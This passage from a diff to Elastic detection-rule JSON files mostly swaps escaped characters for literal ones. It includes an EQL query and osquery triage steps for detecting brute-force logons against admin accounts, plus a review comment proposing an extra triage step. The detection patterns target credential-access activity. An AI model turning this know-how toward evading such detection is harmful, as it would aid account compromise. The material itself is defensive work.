Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', 
sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the host which is the source of this activity.\n\n### False positive analysis\n\n- Authentication misconfiguration or obsolete credentials.\n- Service account password expired.\n- Domain trust relationship issues.\n- Infrastructure or availability issues.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the source host to prevent further post-compromise behavior.\n- If the asset is exposed to the internet with RDP or other remote services available, take the necessary measures to restrict access to the asset. If not possible, limit the access via the firewall to only the needed IP addresses. Also, ensure the system uses robust authentication mechanisms and is patched regularly.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "sequence by winlog.computer_name, source.ip with maxspan=10s\n [authentication where event.action == \"logon-failed\" and winlog.logon.type : \"Network\" and\n source.ip != null and source.ip != \"127.0.0.1\" and source.ip != \"::1\" and user.name : \"*admin*\" and\n\n /* noisy failure status codes often associated to authentication misconfiguration */\n not winlog.event_data.Status : (\"0xC000015B\", \"0XC000005E\", \"0XC0000133\", \"0XC0000192\")] with runs=5\n", "references": [ "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4625" @@ -62,7 +62,7 @@ ], "risk_score": 47, "rule_id": "f9790abf-bd0c-45f9-8b5f-d0b74015e029", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -74,7 +74,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", 
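Review bot: The investigation steps in the new note line never tell the analyst to check whether the guessing succeeded: the only 4624 pivot offered concerns logons to the source host, not the targeted account. The decisive triage step for a brute-force alert is a successful logon for the same `user.name` from the same `source.ip` shortly after the failure burst, because that upgrades the incident from attempted to actual credential compromise; account lockout events for that user are a useful companion signal. I would add under "Possible investigation steps" the bullet `- Check for a successful logon (for example, 4624) for the targeted account from the same source IP following the failures; a success after the burst indicates the guess landed and should escalate the response.` The same gap is present in the earlier version files of this rule in the diff.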
diff --git a/packages/security_detection_engine/kibana/security_rule/f9790abf-bd0c-45f9-8b5f-d0b74015e029_7.json b/packages/security_detection_engine/kibana/security_rule/f9790abf-bd0c-45f9-8b5f-d0b74015e029_7.json index 8c4b35c5380..055a63985f6 100644 --- a/packages/security_detection_engine/kibana/security_rule/f9790abf-bd0c-45f9-8b5f-d0b74015e029_7.json +++ b/packages/security_detection_engine/kibana/security_rule/f9790abf-bd0c-45f9-8b5f-d0b74015e029_7.json 
@@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Privileged Account Brute Force", - "note": "## Triage and analysis\n\n### Investigating Privileged Account Brute Force\n\nAdversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to guess the password using a repetitive or iterative mechanism systematically. More details can be found [here](https://attack.mitre.org/techniques/T1110/001/).\n\nThis rule identifies potential password guessing/brute force activity from a single address against an account that contains the `admin` pattern on its name, which is likely a highly privileged account.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the logon failure reason code and the targeted user name.\n - Prioritize the investigation if the account is critical or has administrative privileges over the domain.\n- Investigate the source IP address of the failed Network Logon attempts.\n - Identify whether these attempts are coming from the internet or are internal.\n- Investigate other alerts associated with the involved users and source host during the past 48 hours.\n- Identify the source and the target computer and their roles in the IT environment.\n- Check whether the involved credentials are used in automation or scheduled tasks.\n- If this activity is suspicious, contact the account owner and confirm whether they are aware of it.\n- Examine the source host for derived artifacts that indicate compromise:\n - Observe and collect information about the following activities in the alert source 
host:\n - Attempts to contact external domains and addresses.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the host which is the source of this activity.\n\n### False positive analysis\n\n- Authentication misconfiguration or obsolete credentials.\n- Service account password expired.\n- Domain trust relationship issues.\n- Infrastructure or availability issues.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the source host to prevent further post-compromise behavior.\n- If the asset is exposed to the internet with RDP or other remote services available, take the necessary measures to restrict access to the asset. 
If not possible, limit the access via the firewall to only the needed IP addresses. Also, ensure the system uses robust authentication mechanisms and is patched regularly.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).",
+ "note": "## Triage and analysis\n\n### Investigating Privileged Account Brute Force\n\nAdversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to guess the password using a repetitive or iterative mechanism systematically. More details can be found [here](https://attack.mitre.org/techniques/T1110/001/).\n\nThis rule identifies potential password guessing/brute force activity from a single address against an account that contains the `admin` pattern on its name, which is likely a highly privileged account.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. 
Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the logon failure reason code and the targeted user name.\n - Prioritize the investigation if the account is critical or has administrative privileges over the domain.\n- Investigate the source IP address of the failed Network Logon attempts.\n - Identify whether these attempts are coming from the internet or are internal.\n- Investigate other alerts associated with the involved users and source host during the past 48 hours.\n- Identify the source and the target computer and their roles in the IT environment.\n- Check whether the involved credentials are used in automation or scheduled tasks.\n- If this activity is suspicious, contact the account owner and confirm whether they are aware of it.\n- Examine the source host for derived artifacts that indicate compromise:\n - Observe and collect information about the following activities in the alert source host:\n - Attempts to contact external domains and addresses.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', 
sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the host which is the source of this activity.\n\n### False positive analysis\n\n- Authentication misconfiguration or obsolete credentials.\n- Service account password expired.\n- Domain trust relationship issues.\n- Infrastructure or availability issues.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the source host to prevent further post-compromise behavior.\n- If the asset is exposed to the internet with RDP or other remote services available, take the necessary measures to restrict access to the asset. If not possible, limit the access via the firewall to only the needed IP addresses. Also, ensure the system uses robust authentication mechanisms and is patched regularly.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).",
 "query": "sequence by winlog.computer_name, source.ip with maxspan=10s\n [authentication where event.action == \"logon-failed\" and winlog.logon.type : \"Network\" and\n source.ip != null and source.ip != \"127.0.0.1\" and source.ip != \"::1\" and user.name : \"*admin*\" and\n\n /* noisy failure status codes often associated to authentication misconfiguration */\n not winlog.event_data.Status : (\"0xC000015B\", \"0XC000005E\", \"0XC0000133\", \"0XC0000192\")] with runs=5\n",
 "references": [
 "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4625"
@@ -62,7 +62,7 @@
 ],
 "risk_score": 47,
 "rule_id": "f9790abf-bd0c-45f9-8b5f-d0b74015e029",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -73,7 +73,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/f9790abf-bd0c-45f9-8b5f-d0b74015e029_8.json b/packages/security_detection_engine/kibana/security_rule/f9790abf-bd0c-45f9-8b5f-d0b74015e029_8.json
index 7a208192362..2a4ed1a0d81 100644
--- a/packages/security_detection_engine/kibana/security_rule/f9790abf-bd0c-45f9-8b5f-d0b74015e029_8.json
+++ b/packages/security_detection_engine/kibana/security_rule/f9790abf-bd0c-45f9-8b5f-d0b74015e029_8.json
@@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Privileged Account Brute Force", - "note": "## Triage and analysis\n\n### Investigating Privileged Account Brute Force\n\nAdversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to guess the password using a repetitive or iterative mechanism systematically. More details can be found [here](https://attack.mitre.org/techniques/T1110/001/).\n\nThis rule identifies potential password guessing/brute force activity from a single address against an account that contains the `admin` pattern on its name, which is likely a highly privileged account.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the logon failure reason code and the targeted user name.\n - Prioritize the investigation if the account is critical or has administrative privileges over the domain.\n- Investigate the source IP address of the failed Network Logon attempts.\n - Identify whether these attempts are coming from the internet or are internal.\n- Investigate other alerts associated with the involved users and source host during the past 48 hours.\n- Identify the source and the target computer and their roles in the IT environment.\n- Check whether the involved credentials are used in automation or scheduled tasks.\n- If this activity is suspicious, contact the account owner and confirm whether they are aware of it.\n- Examine the source host for derived artifacts that indicate compromise:\n - Observe and collect information about the following activities in the alert source 
host:\n - Attempts to contact external domains and addresses.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the host which is the source of this activity.\n\n### False positive analysis\n\n- Authentication misconfiguration or obsolete credentials.\n- Service account password expired.\n- Domain trust relationship issues.\n- Infrastructure or availability issues.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the source host to prevent further post-compromise behavior.\n- If the asset is exposed to the internet with RDP or other remote services available, take the necessary measures to restrict access to the asset. 
If not possible, limit the access via the firewall to only the needed IP addresses. Also, ensure the system uses robust authentication mechanisms and is patched regularly.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n",
+ "note": "## Triage and analysis\n\n### Investigating Privileged Account Brute Force\n\nAdversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to guess the password using a repetitive or iterative mechanism systematically. More details can be found [here](https://attack.mitre.org/techniques/T1110/001/).\n\nThis rule identifies potential password guessing/brute force activity from a single address against an account that contains the `admin` pattern on its name, which is likely a highly privileged account.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. 
Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the logon failure reason code and the targeted user name.\n - Prioritize the investigation if the account is critical or has administrative privileges over the domain.\n- Investigate the source IP address of the failed Network Logon attempts.\n - Identify whether these attempts are coming from the internet or are internal.\n- Investigate other alerts associated with the involved users and source host during the past 48 hours.\n- Identify the source and the target computer and their roles in the IT environment.\n- Check whether the involved credentials are used in automation or scheduled tasks.\n- If this activity is suspicious, contact the account owner and confirm whether they are aware of it.\n- Examine the source host for derived artifacts that indicate compromise:\n - Observe and collect information about the following activities in the alert source host:\n - Attempts to contact external domains and addresses.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', 
sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the host which is the source of this activity.\n\n### False positive analysis\n\n- Authentication misconfiguration or obsolete credentials.\n- Service account password expired.\n- Domain trust relationship issues.\n- Infrastructure or availability issues.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the source host to prevent further post-compromise behavior.\n- If the asset is exposed to the internet with RDP or other remote services available, take the necessary measures to restrict access to the asset. If not possible, limit the access via the firewall to only the needed IP addresses. Also, ensure the system uses robust authentication mechanisms and is patched regularly.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n",
 "query": "sequence by winlog.computer_name, source.ip with maxspan=10s\n [authentication where event.action == \"logon-failed\" and winlog.logon.type : \"Network\" and\n source.ip != null and source.ip != \"127.0.0.1\" and source.ip != \"::1\" and user.name : \"*admin*\" and\n\n /* noisy failure status codes often associated to authentication misconfiguration */\n not winlog.event_data.Status : (\"0xC000015B\", \"0XC000005E\", \"0XC0000133\", \"0XC0000192\")] with runs=5\n",
 "references": [
 "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4625"
@@ -62,7 +62,7 @@
 ],
 "risk_score": 47,
 "rule_id": "f9790abf-bd0c-45f9-8b5f-d0b74015e029",
- "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
+ "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -73,7 +73,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/f994964f-6fce-4d75-8e79-e16ccc412588_102.json b/packages/security_detection_engine/kibana/security_rule/f994964f-6fce-4d75-8e79-e16ccc412588_102.json
index c49a03be7d0..dac61eaeb2b 100644
--- a/packages/security_detection_engine/kibana/security_rule/f994964f-6fce-4d75-8e79-e16ccc412588_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/f994964f-6fce-4d75-8e79-e16ccc412588_102.json
@@ -53,7 +53,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0001",
 "name": "Initial Access",
@@ -68,7 +68,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
@@ -83,7 +83,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
@@ -98,7 +98,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/f994964f-6fce-4d75-8e79-e16ccc412588_103.json b/packages/security_detection_engine/kibana/security_rule/f994964f-6fce-4d75-8e79-e16ccc412588_103.json
index bef704e2cba..c52915769be 100644
--- a/packages/security_detection_engine/kibana/security_rule/f994964f-6fce-4d75-8e79-e16ccc412588_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/f994964f-6fce-4d75-8e79-e16ccc412588_103.json
@@ -50,7 +50,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0001",
 "name": "Initial Access",
@@ -65,7 +65,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
@@ -80,7 +80,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
@@ -95,7 +95,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/f994964f-6fce-4d75-8e79-e16ccc412588_104.json b/packages/security_detection_engine/kibana/security_rule/f994964f-6fce-4d75-8e79-e16ccc412588_104.json
index 96b27f998f5..e0e078f75a1 100644
--- a/packages/security_detection_engine/kibana/security_rule/f994964f-6fce-4d75-8e79-e16ccc412588_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/f994964f-6fce-4d75-8e79-e16ccc412588_104.json
@@ -50,7 +50,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0001",
 "name": "Initial Access",
@@ -65,7 +65,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
@@ -80,7 +80,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
@@ -95,7 +95,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/f994964f-6fce-4d75-8e79-e16ccc412588_205.json b/packages/security_detection_engine/kibana/security_rule/f994964f-6fce-4d75-8e79-e16ccc412588_205.json
index 7361e2f4681..a73ad0fdbe8 100644
--- a/packages/security_detection_engine/kibana/security_rule/f994964f-6fce-4d75-8e79-e16ccc412588_205.json
+++ b/packages/security_detection_engine/kibana/security_rule/f994964f-6fce-4d75-8e79-e16ccc412588_205.json
@@ -50,7 +50,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0001",
 "name": "Initial Access",
@@ -65,7 +65,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
@@ -80,7 +80,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
@@ -95,7 +95,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/fa01341d-6662-426b-9d0c-6d81e33c8a9d_103.json b/packages/security_detection_engine/kibana/security_rule/fa01341d-6662-426b-9d0c-6d81e33c8a9d_103.json
index 95c04755a86..1d2609c875d 100644
--- a/packages/security_detection_engine/kibana/security_rule/fa01341d-6662-426b-9d0c-6d81e33c8a9d_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/fa01341d-6662-426b-9d0c-6d81e33c8a9d_103.json
@@ -50,7 +50,7 @@
 ],
 "risk_score": 47,
 "rule_id": "fa01341d-6662-426b-9d0c-6d81e33c8a9d",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Elastic",
@@ -62,7 +62,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0008",
 "name": "Lateral Movement",
diff --git a/packages/security_detection_engine/kibana/security_rule/fa01341d-6662-426b-9d0c-6d81e33c8a9d_104.json b/packages/security_detection_engine/kibana/security_rule/fa01341d-6662-426b-9d0c-6d81e33c8a9d_104.json
index 649ec797585..4c679f3fbe4 100644
--- a/packages/security_detection_engine/kibana/security_rule/fa01341d-6662-426b-9d0c-6d81e33c8a9d_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/fa01341d-6662-426b-9d0c-6d81e33c8a9d_104.json
@@ -50,7 +50,7 @@
 ],
 "risk_score": 47,
 "rule_id": "fa01341d-6662-426b-9d0c-6d81e33c8a9d",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -61,7 +61,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0008",
 "name": "Lateral Movement",
diff --git a/packages/security_detection_engine/kibana/security_rule/fa01341d-6662-426b-9d0c-6d81e33c8a9d_105.json b/packages/security_detection_engine/kibana/security_rule/fa01341d-6662-426b-9d0c-6d81e33c8a9d_105.json
index bdde3b1d174..a8d43f2c487 100644
--- a/packages/security_detection_engine/kibana/security_rule/fa01341d-6662-426b-9d0c-6d81e33c8a9d_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/fa01341d-6662-426b-9d0c-6d81e33c8a9d_105.json
@@ -50,7 +50,7 @@
 ],
 "risk_score": 47,
 "rule_id": "fa01341d-6662-426b-9d0c-6d81e33c8a9d",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -62,7 +62,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0008",
 "name": "Lateral Movement",
